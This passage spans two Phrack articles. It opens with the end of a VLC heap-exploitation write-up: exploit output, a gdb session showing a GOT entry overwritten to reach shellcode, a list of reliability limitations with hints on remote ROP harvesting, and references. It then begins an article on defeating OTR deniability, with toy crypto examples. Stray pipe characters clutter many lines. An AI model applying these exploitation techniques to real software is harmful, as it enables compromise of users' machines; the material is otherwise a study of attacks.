0x28bac980...0x28bac9c0...0x28baca00...0x28baca40...0x28baca80...
|
|
0x28bacac0...0x28bacb00...0x28bacb40...0x28bacb80...0x28bacbc0...
|
|
0x28bacc00...0x28bacc40...0x28bacc80...0x28baccc0...0x28bacd00...
|
|
0x28bacd40...0x28bacd80...0x28bacdc0...0x28bace00...0x28bace40...
|
|
0x28bace80...0x28bacec0...0x28bacf00...0x28bacf40...0x28bacf80...
|
|
0x28bacfc0...0x28bad080...0x28bad0c0...0x28bad100...0x28bad140...
|
|
0x28bad180...0x28bad1c0...0x28bad200...0x28bad240...0x28bad280...
|
|
0x28bad2c0...0x28bad300...0x28bad340...0x28bad380...0x28bad3c0...
|
|
0x28bad400...0x28bad440...0x28bad480...0x28bad4c0...0x28bad500...
|
|
0x28bad540...0x28bad580...0x28bad5c0...0x28bad600...0x28bad640...
|
|
0x28bad680...0x28bad6c0...0x28bad700...0x28bad740...0x28bad780...
|
|
0x28bad7c0...0x28bad800...0x28bad840...0x28bad880...0x28bad8c0...
|
|
0x28bad900...0x28bad940...0x28bad980...0x28bad9c0...0x28bada00...
|
|
0x28bada40...0x28bada80...0x28badac0...0x28badb00...0x28badb40...
|
|
0x28badb80...0x28badbc0...0x28badc00...0x28badc40...0x28badc80...
|
|
0x28badcc0...0x28badd00...0x28badd40...0x28badd80...0x28baddc0...
|
|
0x28bade00...0x28bade40...0x28bade80...0x28badec0...0x28badf00...
|
|
0x28badf40...0x28badf80...0x28badfc0...0x28bae080...0x28bae0c0...
|
|
0x28bae100...0x28bae140...0x28bae180...0x28bae1c0...0x28bae200...
|
|
0x28bae240...0x28bae280...0x28bae2c0...0x28bae300...0x28bae340...
|
|
0x28bae380...0x28bae3c0...0x28bae400...0x28bae440...0x28bae480...
|
|
0x28bae4c0...0x28bae500...0x28bae540...0x28bae580...0x28bae5c0...
|
|
0x28bae600...0x28bae640...0x28bae680...0x28bae6c0...0x28bae700...
|
|
0x28bae740...0x28bae780...0x28bae7c0...0x28bae800...0x28bae840...
|
|
0x28bae880...0x28bae8c0...0x28bae900...0x28bae940...0x28bae980...
|
|
0x28bae9c0...0x28baea00...0x28baea40...0x28baea80...0x28baeac0...
|
|
0x28baeb00...0x28baeb40...0x28baeb80...0x28baebc0...0x28baec00...
|
|
0x28baec40...0x28baec80...0x28baecc0...0x28baed00...0x28baed40...
|
|
0x28baed80...0x28baedc0...0x28baee00...0x28baee40...0x28baee80...
|
|
0x28baeec0...0x28baef00...0x28baef40...0x28baef80...0x28baefc0...
|
|
0x28baf080...0x28baf0c0...0x28baf100...0x28baf140...0x28baf180...
|
|
0x28baf1c0...0x28baf200...0x28baf240...0x28baf280...0x28baf2c0...
|
|
0x28baf300...0x28baf340...0x28baf380...0x28baf3c0...0x28baf400...
|
|
0x28baf440...0x28baf480...0x28baf4c0...0x28baf500...0x28baf540...
|
|
0x28baf580...0x28baf5c0...0x28baf600...0x28baf640...0x28baf680...
|
|
0x28baf6c0...0x28baf700...0x28baf740...0x28baf780...0x28baf7c0...
|
|
0x28baf800...0x28baf840...0x28baf880...0x28baf8c0...0x28baf900...
|
|
0x28baf940...0x28baf980...0x28baf9c0...0x28bafa00...0x28bafa40...
|
|
0x28bafa80...0x28bafac0...0x28bafb00...0x28bafb40...0x28bafb80...
|
|
0x28bafbc0...0x28bafc00...0x28bafc40...0x28bafc80...0x28bafcc0...
|
|
0x28bafd00...0x28bafd40...0x28bafd80...0x28bafdc0...0x28bafe00...
|
|
0x28bafe40...0x28bafe80...0x28bafec0...0x28baff00...0x28baff40...
|
|
0x28baff80...0x28baffc0...ok
|
|
[~] Forcing shellcode execution
[~] Playing MP4 file 1 times
.ok
[~] Done

The console on the other side looks like the following:

Program received signal SIGTRAP, Trace/breakpoint trap.
0x28919b01 in ?? ()

The exploit output informs us that the .got entry for memset() lies
at 0x284edea8. Let's verify...

(gdb) x/4bx 0x284edea8
0x284edea8: 0x00 0x9b 0x91 0x28
(gdb) x/i 0x28919b00
0x28919b00: int3

Obviously, it has been overwritten with the pointer to our ASM
instructions; read as a little-endian dword, the four bytes above are
0x28919b00. The 'SIGTRAP' informs us that EIP landed on top of them.

(gdb) quit
A debugging session is active.

Inferior 1 [process 2078] will be killed.

Quit anyway? (y or n) y

If you decide not to use gdb (that's what real men do), the following
message will pop up upon successful exploitation.

Trace/BPT trap: 5 (core dumped)

--[ 7 - Limitations

As we promised, we will give a list of the factors that limit our
exploit's reliability. People interested in improving our code should
first have a look below.

1 - Back in the section where we analyzed the RMF vulnerability, we said
that the memory range we want to leak is trashed with 'i_frame_size'
bytes; in our exploit code we use a frame size of 20, so 20 bytes end up
being written at the target address. Because of this trashing of the
target memory, we cannot leak .text or any other read-only mapping of the
target application, since attempting to write to it will terminate VLC
with a segmentation violation. Quick tests show that we cannot somehow
set 'i_frame_size' to 0 so that 'memcpy()' becomes a nop. Nevertheless,
the interested reader is advised to analyze this further and find a way
to bypass this limitation.

Note: Recall the RMF vulnerability; a function pointer overwrite is
possible. Managing to leak .text addresses means you can do automated
remote ROP gadget harvesting in order to write a reliable exploit ;)

2 - For some reason we are not aware of, requesting a memory leak of more
than 8MB returns no data at all. Maybe this is related to the output
filters splitting the 'p_blocks' in smaller parts, or maybe not ;p This
is a very important limitation, since smaller leaked data chunks mean
more requests for leaked memory, which in turn implies more memory being
trashed. Consequently, more data we shouldn't touch may be modified,
resulting in an unexpected crash of VLC.

3 - Unfortunately, there's at least one logical bug within VLC; a logical
bug related to input buffering and the clients receiving network streams.
When we have some free time we may report it to the VLC developers :p
More logical bugs that limit the exploitation process' reliability may be
present. A reliable one shot exploit requires a harder study of VLC's
source code (yeah, as if we have nothing better to deal with).

4 - The exploit assumes that 64-byte regions usually lie between
0x28700000 and 0x28e00000 and tries to locate them. Sometimes the heap
extends beyond that range. We have to find a way to figure this out, get
the topmost heap address and explore the whole region. Doing that in a
reliable way requires problem 2 to be solved first.

5 - In section 5.2 we analyzed how the 'p_root' candidates are located.
The process described in the aforementioned section takes into account
only the bins of the first arena, but VLC, being a multithreaded
application, initializes more than one. We believe it's possible to
detect those extra arenas, locate their bin-64 addresses and take them
into account as well. Alternatively, one may leak and analyze the TLS
data of each thread, thus locating their magazine racks, their magazines
and the 'rounds[]' array corresponding to 64-byte regions.

6 - In step 6 of section 5.2 we said that all regions of the detected
runs will eventually be freed by our special MP4 file, in the hope that
'p_root' will lie somewhere within them. Although we do our best to fill
heap holes, this process may result in a segmentation fault due to the
fact that regions already freed are freed for a second time. It is
possible to avoid this by having a look at the target runs' region bitmap
and freeing only those regions that seem to be allocated. We didn't have
the time to implement this but we believe it's trivial (take a look at
the comments in the exploit's 'main.py').

If you manage to solve any of these problems, please let us know; don't
be a greedy pussy ;)

--[ 8 - Final words

Exploit development is definitely a hard task; do you think that the
money offered by [censored] is worth the trouble?

In this article, which is short compared to our efforts during the
exploit development, we tried to give as much detail as possible.
Unfortunately there's no way for us to present every minor detail; a
deeper look into VLC's source code is required. All that jemalloc stuff
was fun but tiresome. We think it's about time we take some time off :)
We would like to thank the Phrack staff for being the Phrack staff, our
grhack.net colleagues and all our friends that still keep it real. Our
work is dedicated to all those 'producers' of the security ecosystem
that keep their mouth shut and put their brains to work. Love, peace
and lots of #.

--[ 9 - References

[1] vl4d1m1r of ac1db1tch3z, The art of exploitation: Autopsy of cvsxpl
    http://www.phrack.org/issues.html?issue=64&id=15&mode=txt

[2] Feline Menace, Technical analysis of Samba WINS stack overflow
    http://www.phrack.org/issues.html?issue=65&id=12&mode=txt

[3] GOBBLES, Local/remote mpg123 exploit
    http://www.securityfocus.com/archive/1/306476

[4] VLC Security Advisory 1103
    http://www.videolan.org/security/sa1103.html

[5] Chapter 4. Examples for advanced use of VLC's stream output
    (transcoding, multiple streaming, etc...)
    http://www.videolan.org/doc/streaming-howto/en/ch04.html

[6] VLC Security Advisory 1105
    http://www.videolan.org/security/sa1105.html

[7] RealAudio
    http://en.wikipedia.org/wiki/RealAudio

[8] RealAudio sipr
    http://wiki.multimedia.cx/index.php?title=RealAudio_sipr

--[ 10 - T3h l337 c0d3z

--[ EOF

==Phrack Inc.==

Volume 0x0e, Issue 0x44, Phile #0x0e of 0x13

|=-----------------------------------------------------------------------=|
|=-----------=[ Secure Function Evaluation vs. Deniability ]=------------=|
|=------------------=[ in OTR and similar protocols ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------=[ greg <greg@so36.net> ]=----------------------=|
|=-----------------------------------------------------------------------=|

--[ Contents
|
|
|
|
1 - Introduction
|
|
1.1 - Prelude
|
|
|
|
2 - Preliminaries
|
|
2.1 - Diffie-Hellman
|
|
2.2 - RSA
|
|
2.3 - Oblivious Transfer
|
|
2.4 - Secure Function Evaluation
|
|
|
|
3 - OTR
|
|
|
|
4 - The Attack
|
|
4.1 - Sharing Diffie-Hellman Keys
|
|
4.2 - Generating MAC and Encryption Keys
|
|
4.3 - Sending and Receiving Messages
|
|
4.4 - The Final Protocol
|
|
4.5 - What's Left
|
|
|
|
5 - References
|
|
|
|
6 - Greetingz
|
|
|
|
--[ 1 - Introduction
|
|
|
|
Recent cryptographic primitives and protocols offer a wide range of
|
|
features besides confidentiality and integrity. There are many protocols
|
|
that have more advanced properties, such as forward secrecy, deniability or
|
|
anonymity. In this article, we're going to have a deeper look at
|
|
deniability in communication (e.g. messaging) protocols. One protocol that
|
|
claims to offer deniability is OTR. Although our construction can probably
|
|
be extended in a quite general way, we'll stick with OTR as an example
|
|
protocol. Our goal is to show the limits of deniability, especially in
|
|
protocols that offer message integrity features (as OTR does). We will do
|
|
this by constructing a protocol that enables each partner in a conversation
|
|
to cooperate with an observing party, such that he can prove the
|
|
authenticity of any message that was part of the conversation to the
|
|
observing party.
|
|
|
|
------[ 1.1 - Prelude
|
|
|
|
It was one of these days sitting together with bruhns and discussing stuff
|
|
(TM). Out of the blue, he came up with the question: "You know, I'm
|
|
asking myself what a trusted timestamping service could be good for...?". I
|
|
told him "timestamps, most probably". He was like "Uhm, yes. And wouldn't
|
|
that affect the deniability of OTR somehow?". We discussed the matter for
|
|
quite a while and we finally agreed that a trusted timestamping service
|
|
itself wouldn't be enough to destroy the deniability of OTR. But our
|
|
interest remained...
|
|
|
|
--[ 2 - Preliminaries
|
|
|
|
In this section, we're going to give a quick overview of cryptographic
|
|
primitives we're gonna use. If you're already familiar with those, you can
|
|
happily skip our explanations and get to the real meat. The explanations
|
|
in this section will not contain all the mathematical background (i.e.
|
|
proofs ;) ), which is necessary to really *understand* what's going on.
|
|
We'd rather like to provide a high-level overview of all the individual
components and how they can be combined.
|
|
|
|
------[ 2.1 - Symmetric Operations
|
|
|
|
We'll keep this real short; you probably know the most common symmetric
crypto algorithms. We will be using symmetric block ciphers (such as AES)
and hash functions (SHA for instance). Also, we will need MAC functions in
the following sections. You might already know HMAC, which is a MAC scheme
based on hash functions. MACs (Message Authentication Codes) are used to
protect the integrity of messages. Being a symmetric primitive, creating
and verifying the MAC requires knowledge of the same key. If someone can
verify a MAC, they can also create one.
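
To make that last point concrete, here is a tiny Python sketch (using only
the standard hmac module, no OTR code; the key and message strings are just
examples) of the "whoever can verify a MAC can also forge one" property:

import hashlib, hmac

def make_mac(key, message):
    # Anyone holding 'key' can compute this tag...
    return hmac.new(key, message, hashlib.sha256).digest()

def verify_mac(key, message, tag):
    # ...and verification needs the very same key, so a verifier could
    # just as well have produced the tag themselves.
    return hmac.compare_digest(make_mac(key, message), tag)

key = b"shared secret between Alice and Bob"
msg = b"hi Bob, it's me"
tag = make_mac(key, msg)

assert verify_mac(key, msg, tag)                        # Bob checks the MAC
forged = b"something Alice never said"
assert verify_mac(key, forged, make_mac(key, forged))   # ...or forges one
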
------[ 2.1 - Diffie-Hellman
|
|
|
|
The Diffie-Hellman scheme is one of the most widely used key establishment
|
|
protocols today. The basic idea is the following: Alice and Bob want to
|
|
securely establish a key over an insecure channel. Diffie-Hellman enables
|
|
them to do this. During such a key-exchange both parties publicly send some
|
|
values and after the communication is finished, both can compute a common
|
|
key, which can *not* be computed by anyone who wiretaps the communication.
|
|
|
|
--------[ 2.1.1 The Math behind it
|
|
|
|
Alice and Bob agree on a prime p and some "generator" g. We won't discuss
|
|
too many details of the mathematical background here (if you're interested
|
|
in math, refer to [1]), so it's sufficient to say that in practice, g will
|
|
often have the value 2 and the prime p will be large. In many cases, p and
|
|
g are fixed parameters, on which both parties rely. Before describing the
|
|
actual protocol, we want to show one interesting observation: Given some
|
|
number x, it's trivial to compute values y = g^x mod p ("square and
|
|
multiply" are the magic words). Given the value y however, it's not trivial
|
|
at all to compute the value of x ("discrete logarithm problem", if you're
|
|
interested). This property can be used to build a key-establishment scheme
|
|
like this:
|
|
|
|
A --------------- a = g^x mod p --------------> B
|
|
A <-------------- b = g^y mod p --------------- B
|
|
|
|
A picks a random x, computes a = g^x mod p and sends that value over to B.
|
|
B picks a random y, computes b = g^y mod p and sends that value over to A.
|
|
The values a and b are also referred to as Diffie-Hellman public keys.
|
|
A now performs the following computation:
|
|
|
|
(2.1.1) ka = b^x mod p
|
|
|
|
B does the same and computes
|
|
|
|
(2.1.2) kb = a^y mod p
|
|
|
|
We can observe that due to the equation
|
|
|
|
(2.1.3) ka = b^x mod p = (g^y)^x = g^(yx) = g^(xy) = (g^x)^y = a^y = kb
|
|
|
|
ka and kb are equal. So A and B have established a common key k
|
|
(k = ka = kb). As an attacker however neither knows x nor y, he cannot
|
|
perform the same computation. The attacker could try to obtain x from a,
|
|
but as we outlined above, this is (hopefully) computationally infeasible
|
|
for large primes p and good generators g. In case of an active attacker,
|
|
this scheme can be broken by a simple man-in-the-middle attack, where the
|
|
attacker replaces Alice's and Bob's values by his own ones and then proxies
|
|
the traffic between both parties. This problem can be fixed by making use
|
|
of an authentication scheme: Alice and Bob need to "sign" the values that
|
|
they transfer, so that the attacker cannot modify them without destroying
|
|
the signature. There are many signature schemes out there (for instance
|
|
based on RSA, which is described below) and all of them come with
|
|
additional costs (you need to exchange public keys beforehand etc.). We
|
|
assume you know about all the higher-level problems, such as key
|
|
distribution, revocations, trust-models, etc. The basic principle of
|
|
Diffie-Hellman however stays the same - and that is what we're going to
|
|
focus on later in this article.
|
|
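As a quick sanity check of the algebra above, here is a toy Diffie-Hellman
run in Python. The parameters are deliberately tiny and are our own picks
for readability; a real deployment uses a large, carefully chosen prime:

import secrets

p = 2**127 - 1        # a small Mersenne prime; far too small for real use
g = 2

x = secrets.randbelow(p - 2) + 1      # Alice's secret exponent
y = secrets.randbelow(p - 2) + 1      # Bob's secret exponent

a = pow(g, x, p)      # a = g^x mod p, sent from Alice to Bob
b = pow(g, y, p)      # b = g^y mod p, sent from Bob to Alice

ka = pow(b, x, p)     # Alice computes (2.1.1)
kb = pow(a, y, p)     # Bob computes (2.1.2)

assert ka == kb       # the shared key, as equation (2.1.3) promises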
|
|
------[ 2.2 - RSA
|
|
|
|
Another gem of modern cryptography is the RSA crypto system. RSA is also
|
|
based on modular arithmetic, but it works in a different way than
|
|
Diffie-Hellman. Alice wants Bob to send her an encrypted message. However,
|
|
Alice and Bob have not exchanged any key material (if they had, Bob could
|
|
just make use of any block-cipher like AES to send encrypted data to
|
|
Alice). With RSA, Alice can send Bob a thing called her "public key". This
|
|
public key can be used by Bob to encrypt messages. However, nobody can
|
|
decrypt messages encrypted with Alice's public key without knowing another
|
|
piece of information called Alice's "secret key". As the name suggests,
|
|
Alice keeps her secret key secret. Therefore everybody can encrypt messages
|
|
for Alice, but nobody besides Alice can decrypt these messages.
|
|
|
|
--------[ 2.2.1 More Math
|
|
|
|
Alice wants to receive messages from Bob, so she first needs to generate an
|
|
RSA key-pair. Alice does the following: She picks two primes p and q and
|
|
computes
|
|
|
|
(2.2.1) N = p * q
|
|
|
|
She picks a value e (in practice, e = 65537 is a common choice) and
|
|
computes
|
|
|
|
(2.2.2) d = e^-1 mod (p-1)(q-1) (i.e. e*d = 1 mod (p-1)(q-1))
|
|
|
|
This computation can be performed efficiently using the extended euclidean
|
|
algorithm (but again, we won't dive into all the mathematical details too
|
|
much). Alice keeps all the values besides N and e secret.
|
|
|
|
A ---------------- N = p * q, e --------------> B
|
|
A <--------------- c = m^e mod N --------------- B
|
|
|
|
Alice now sends over N and e to Bob. Bob uses N and e to encrypt his
|
|
message m as follows:
|
|
|
|
(2.2.3) c = m^e mod N
|
|
|
|
Then, Bob sends the ciphertext c over to Alice. Alice can use d to decrypt
|
|
the ciphertext:
|
|
|
|
(2.2.4) m = c^d mod N
|
|
|
|
This works due to the way e and d are chosen in equation (2.2.2).
|
|
To decrypt the ciphertext, an attacker could of course try to compute d.
|
|
But computing d is hard without knowing p and q. And obtaining p and q from
|
|
N is assumed to be an infeasible problem for large values of N.
|
|
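The key generation and the encryption/decryption round trip above fit in a
few lines of Python (3.8+, which can compute the modular inverse via pow).
The primes are toy-sized values of our own choosing and there is no
padding, i.e. exactly the kind of RSA that should never be deployed:

p, q = 61, 53                        # toy primes; real keys use huge primes
N = p * q                            # (2.2.1)
e = 17
d = pow(e, -1, (p - 1) * (q - 1))    # (2.2.2): e*d = 1 mod (p-1)(q-1)

m = 65                               # the 'message', encoded as a number < N
c = pow(m, e, N)                     # (2.2.3): Bob encrypts with (N, e)
assert pow(c, d, N) == m             # (2.2.4): Alice decrypts with d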
|
|
The tuple (N, e) is commonly called an RSA public key, whereas (N, d) is
|
|
called private key. We can view an RSA instance (with fixed keys) as a set
|
|
of two functions, f and f^-1, where f is the function that encrypts data
|
|
using the public key and f^-1 is the function that decrypts data using the
|
|
private key. We'll call such functions one-way functions.
|
|
|
|
Instead of encrypting data with the receiver's public key, we can also use
|
|
RSA as a signature scheme. The signer of a message first uses a hash
|
|
function on his message. He then encrypts the hash value with his private
|
|
key. This signature can be verified using the signer's public key: the
|
|
verifier uses the public key to decrypt the hash value, computes the hash
|
|
of the message he received and then compares the hashes. An attacker will
|
|
not be able to produce such a signature, because he doesn't know the
|
|
signer's private key.
|
|
|
|
Please be aware that (like all the other algorithms described in this
|
|
document), RSA should in practice not be used as described above. In
|
|
particular, we did not describe how to correctly convert messages into
|
|
numbers (RSA operates on natural numbers, remember?) and how to securely
|
|
pad plaintexts. Depending on the respective security goals, there are a
|
|
number of possible padding schemes (such as OAEP+), but we're not going to
|
|
describe them here in detail.
|
|
|
|
------[ 2.3 - Oblivious Transfer
|
|
|
|
Oblivious transfer is a real funny primitive. Suppose, Bob knows two values
|
|
x0 and x1. Alice wants to obtain one of those values, but she doesn't want
|
|
to tell Bob which value she wants. Now Bob could of course tell Alice both
|
|
values (that way he wouldn't know, which one Alice was interested in).
|
|
However, Bob wants to make some money and so he takes $1k per value. Poor
|
|
Alice however only has $1k, so she can't afford to buy both values from
|
|
Bob. This problem can be solved with an oblivious transfer. An oblivious
|
|
transfer is a cryptographic protocol, so it requires a number of messages
|
|
to be exchanged between Alice and Bob. After the messages are exchanged,
|
|
Alice will receive the value she wanted and Bob won't know which value that
|
|
was.
|
|
|
|
--------[ 2.3.1 Math Voodoo
|
|
|
|
There are a number of protocols for performing an oblivious transfer, based
|
|
on different cryptographic assumptions. We are going to describe one
|
|
classical example here, which can be implemented using a public-key
|
|
cryptosystem (such as RSA). More details of this construction can be found
|
|
in [7].
|
|
|
|
The system works like this: Bob picks one-way functions f, f^-1 and sends f
|
|
over to Alice. Along with f, he sends two random values r0 and r1. You can
|
|
think of f and f^-1 as RSA functions using fixed keys (as described above).
|
|
|
|
A <---------------- f, r0, r1 -------------- B
|
|
A ------------- z = f(k) XOR rb -----------> B
|
|
|
|
Alice wants to receive value xb (b = 0 or 1) from Bob. She picks a random
|
|
k, computes f(k) and XORs it with r0 if she wants to receive x0 or with r1
|
|
if she wants to receive x1. The XOR operation is sometimes also called
|
|
"blinding". Depending on the cryptosystem that is used to obtain f and
|
|
f^-1, there might be more appropriate choices than just using XOR. For RSA,
|
|
it would be natural to use integer addition and subtraction (modulo N)
|
|
instead of the XOR operation.
|
|
|
|
Alice now sends the result z to Bob. Bob performs some computations:
|
|
|
|
(2.3.1) k0 = f^-1(z XOR r0)
|
|
(2.3.1) k1 = f^-1(z XOR r1)
|
|
|
|
One of the k values will be Alice's, but Bob doesn't know which one. The
|
|
other value will be junk, but it's important to note that this junk value
|
|
cannot be computed by Alice (she doesn't know f^-1). Now Bob simply does
|
|
the following:
|
|
|
|
A <---------- x0 XOR k0, x1 XOR k1 --------- B
|
|
|
|
Depending on which k value is the one that Alice actually knows, she can
|
|
decrypt x0 or x1. And that's it: Alice now knows the value she wanted to
|
|
receive and one junk value, which doesn't tell her anything. Bob however
|
|
doesn't know which of the k values was the one that Alice picked, so he
cannot tell which value Alice wanted to receive.
|
|
|
|
Let's try it out:
|
|
Say Bob has two values x0 = 7 and x1 = 1. He is willing to share one with
|
|
Alice. First he generates f and f^-1. To do that, he just uses RSA. He
|
|
picks two prime numbers p = 5 and q = 11 and gets N = 55. Also, he picks
|
|
e = 3 as encryption exponent (don't do that at home, kids!). The
|
|
decryption exponent would then be d = 27 (you can compute that using the
|
|
euclidean algorithm or alternatively you could just believe us). Bob now
|
|
can send out (N, e) = (55, 3) to Alice, along with some random values
|
|
(r0, r1) = (4, 9).
|
|
|
|
Suppose Alice wants to retrieve the value of x1. First of all, she picks a
|
|
random k, let's say k = 6. She encrypts it using the public key Bob sent
|
|
(i.e. she applies Bob's one-way function): f(6) = 6^3 mod 55 = 51. She
|
|
computes z = f(k) + r1 = 51 + 9 mod 55 = 5, which she sends to Bob.
|
|
|
|
Bob now determines his candidates for k (i.e. k0 and k1) by computing:
|
|
k0 = f^-1(z - r0) = (5 - 4)^27 mod 55 = 1
|
|
k1 = f^-1(z - r1) = (5 - 9)^27 mod 55 = 6 <-- Alice's k, but Bob doesn't
|
|
know that
|
|
Bob then sends to Alice: x0 + k0 = 7 + 1 and x1 + k1 = 1 + 6.
|
|
|
|
Alice receives the two values 8 and 7. She knows that Bob's second value
|
|
was x1 + k. As she is interested in x1, she takes that value and computes
|
|
x1 = (x1 + k1) - k = 7 - 6 = 1 (observe that k = k1, which only Alice
|
|
knows). Now Alice could try to cheat and to also obtain x0. But to do that,
|
|
she would need to know the value that Bob computed for k0, which she won't
|
|
be able to compute without knowing f^-1 (i.e. the secret exponent d in our
|
|
case).
|
|
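The whole toy run can be replayed in a few lines of Python with the same
numbers as above (addition and subtraction mod N play the role of the
blinding operation, as suggested for RSA):

N, e, d = 55, 3, 27          # Bob's toy RSA one-way function f / f^-1
x0, x1 = 7, 1                # the two values Bob offers
r0, r1 = 4, 9                # the random values Bob sends to Alice

# Alice wants x1: she picks a random k and blinds f(k) with r1.
k = 6
z = (pow(k, e, N) + r1) % N          # 51 + 9 mod 55 = 5, sent to Bob

# Bob cannot tell which r value Alice used, so he computes both candidates.
k0 = pow((z - r0) % N, d, N)         # junk (here: 1)
k1 = pow((z - r1) % N, d, N)         # Alice's k (here: 6), unknowingly
m0, m1 = (x0 + k0) % N, (x1 + k1) % N    # 8 and 7, both sent to Alice

# Alice only knows k (= k1), so only x1 is recoverable on her side.
assert (m1 - k) % N == x1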
|
|
------[ 2.4 - Secure Function Evaluation
|
|
|
|
Secure function evaluation is another real gem of modern cryptography. A
|
|
classical example is the 0day problem. Two hackers A and B have a certain
|
|
number of 0day exploits each. They want to determine who is more elite, but
|
|
they are so paranoid that they don't even want the other to know how many
|
|
0days they have. So, A knows some number x, B knows y and both want to
|
|
compute the function f(x, y) = { 1 if x > y, -1 if y > x and 0 otherwise}.
|
|
Secure Function Evaluation solves this problem. Again, both parties
|
|
exchange a number of messages and after this is done, both of them know the
|
|
result of the function without having learned anything about the input of
|
|
the other party. And instead of the function shown above, they could just
|
|
arbitrarily agree on any function to be evaluated.
|
|
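Written down as ordinary code, before any garbling happens, the function
the two hackers want to evaluate jointly is nothing more than:

def f(x, y):
    # "who has more 0days": 1 if x > y, -1 if y > x, 0 otherwise
    if x > y:
        return 1
    if y > x:
        return -1
    return 0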
|
|
One interesting practical application of SFE is to perform mutual
|
|
authentication based on a shared secret. Two parties knowing a shared
|
|
secret can jointly compute the function
|
|
f(x, y) = {1 if x = y, 0 otherwise}. Interestingly, the OTR protocol makes
|
|
use of such a SFE scheme for authentication.
|
|
|
|
--------[ 2.4.1 More Voodoo
|
|
|
|
Suppose there is a function f(x, y), which two parties want to compute
|
|
(this is actually secure two-party computation, which is not the most
|
|
general case - for our purpose however it is sufficient). Both want to
|
|
share the result and both want to keep their own inputs safe. There are
|
|
several constructions that allow us to perform SFE. We'll discuss only one
|
|
of them here: Yao's garbled circuits [3]. As the name suggests, the
|
|
function to be evaluated by both parties first has to be transformed to a
|
|
boolean circuit. For many functions, this is generally not a problem. The
|
|
next step is to "garble" the circuit. The main idea behind this garbling
|
|
process is that we want everyone to be able to evaluate the circuit, while
|
|
nobody should see what he actually evaluates. Therefore, we will try to
|
|
hide all the bits that "flow" through the circuit. For hiding the bits, we
|
|
could make use of a block cipher. However, we have to take care that the
|
|
circuit can still be evaluated! Therefore, we will also have to modify all
|
|
the gates in the circuit somehow, so that they are able to work with
|
|
"garbled" inputs. Now one could imagine that such a modification is a hard
|
|
task. Fortunately, there's a simple trick: All the gates in our circuit are
|
|
very small boolean functions (by small we mean that they don't have many
|
|
inputs). We can therefore replace every gate by its truth table. The truth
|
|
table simply maps the input bits to the respective output bits. For a
|
|
simple NAND gate, the truth table would look like this:
|
|
|
|
\a|
|
|
b\| 1 0
|
|
--+----
|
|
1 | 0 1
|
|
0 | 1 1
|
|
|
|
Now that we have replaced every gate by its truth table, we will just have
|
|
to modify the truth tables, so that they reflect the fact that all the bit
|
|
values are garbled. The trick here is the following: Instead of the real
|
|
values of the input bits (1 or 0), we pick random cryptographic keys (say
|
|
128 bits long). We will then use those keys to encrypt the values in the
|
|
truth table. Instead of the input values for the gate, we will then use the
|
|
random keys (i.e. instead of 1 or 0, we just pick two random bitstrings per
|
|
wire).
|
|
|
|
As an example, consider a NAND gate again. We choose four keys ka0, ka1,
|
|
kb0 and kb1. Those are the keys for the respective input values of the gate
|
|
(i.e. a=0, a=1, b=0, b=1). Also, we pick an encryption function E and a
|
|
decryption function D. For simplicity, we assume that if a wrong key is
|
|
supplied to D, it will signal this (e.g. return an error code) instead of
|
|
providing a junk plaintext. We now perform the following transformation on
|
|
the truth table of our gate:
|
|
|
|
\a| \ a|
|
|
b\| 1 0 b \ | 1 0
|
|
--+----- -----> ---------+--------------------------------
|
|
1 | 0 1 1 | E_ka1(E_kb1(0)) E_ka0(E_kb1(1))
|
|
0 | 1 1 0 | E_ka1(E_kb0(1)) E_ka0(E_kb0(1))
|
|
|
|
The elements in the truth table are double encrypted using the two keys
|
|
that belong to the values of a or b, respectively. When evaluating the
|
|
circuit, you only know the keys that correspond to the correct input values
|
|
(so for example you know ka0 and kb1 but no other key). By simply trying to
|
|
decrypt every value in the table, it is easy to find the according output
|
|
value (only one decryption will succeed).
|
|
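To make the single-gate case concrete, here is a self-contained toy
garbling of that NAND gate in Python. The 'cipher' is just a hash-derived
XOR pad and the zero padding acts as the wrong-key detector; the key sizes
and the construction are our own choices made to mirror the description
above, and this is in no way a secure garbling scheme:

import hashlib, random, secrets

BLOB = 16                                  # key/ciphertext size in bytes

def E(key, plaintext):
    # Toy 'encryption': XOR with a pad derived from the key.
    pad = hashlib.sha256(key).digest()[:BLOB]
    return bytes(x ^ y for x, y in zip(pad, plaintext))

D = E                                      # XOR pad: decryption = encryption

def encode(bit):
    # Output bit followed by zero padding, so a wrong key is detectable.
    return bytes([bit]) + b"\x00" * (BLOB - 1)

def decode(plaintext):
    return plaintext[0] if plaintext[1:] == b"\x00" * (BLOB - 1) else None

# One random key per wire value: ka[0], ka[1], kb[0], kb[1].
ka = [secrets.token_bytes(BLOB) for _ in range(2)]
kb = [secrets.token_bytes(BLOB) for _ in range(2)]

# Garbled NAND truth table: each output double-encrypted, rows shuffled.
table = [E(ka[a], E(kb[b], encode(1 - (a & b))))
         for a in (0, 1) for b in (0, 1)]
random.shuffle(table)

def evaluate(key_a, key_b):
    # The evaluator holds exactly one key per input wire and simply tries
    # every row; only the matching row decrypts to a well-formed value.
    for entry in table:
        out = decode(D(key_b, D(key_a, entry)))
        if out is not None:
            return out

assert evaluate(ka[1], kb[1]) == 0         # NAND(1, 1) = 0
assert evaluate(ka[0], kb[0]) == 1         # NAND(0, 0) = 1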
|
|
The next question would then be: How to garble a whole circuit? It's not
|
|
much different. Assume that two gates are connected like this:
|
|
|
|
Out
|
|
|
|
|
+------+
|
|
| G1 |
|
|
+------+
|
|
| |
|
|
+---+ In_3
|
|
|G2 |
|
|
+---+
|
|
| \
|
|
In_1 In_2
|
|
|
|
We have inputs In_1, In_2, In_3 and one output value Out. G2's output is
|
|
connected to one of the input wires of G1. In the truth table of G2, we
|
|
therefore put the *key* that corresponds to the respective input value of
|
|
G1 (so instead of double-encrypting G2's output value 1 or 0, we
|
|
double-encrypt the respective key for one of G1's input pins). The gate G1
|
|
can be garbled as described above. The keys for the input wires In_1, In_2
|
|
and In_3 are assumed to be already known by the party evaluating the
|
|
circuit. G2 can now easily be evaluated and yields the missing key for
|
|
evaluating the gate G1. However, during the evaluation of the circuit, no
|
|
intermediate values (like the real output of G2) are disclosed to the
|
|
evaluating party.
|
|
|
|
Let's try that in practice:
|
|
Say Alice and Bob want to evaluate a function. The following protocol can
|
|
be used: A prepares a garbled circuit and hard-codes her input values into
|
|
the circuit. She sends the result to B. B now needs to retrieve the keys
|
|
for his input values from A. But beware of two limitations here:
|
|
1) B doesn't want to disclose his input values to A (obviously).
|
|
2) A doesn't want to tell B the keys for both input values, because
|
|
then B would be able to reverse-engineer the circuit and to obtain
|
|
A's input values.
|
|
You've probably already seen the solution: B uses an oblivious transfer to
|
|
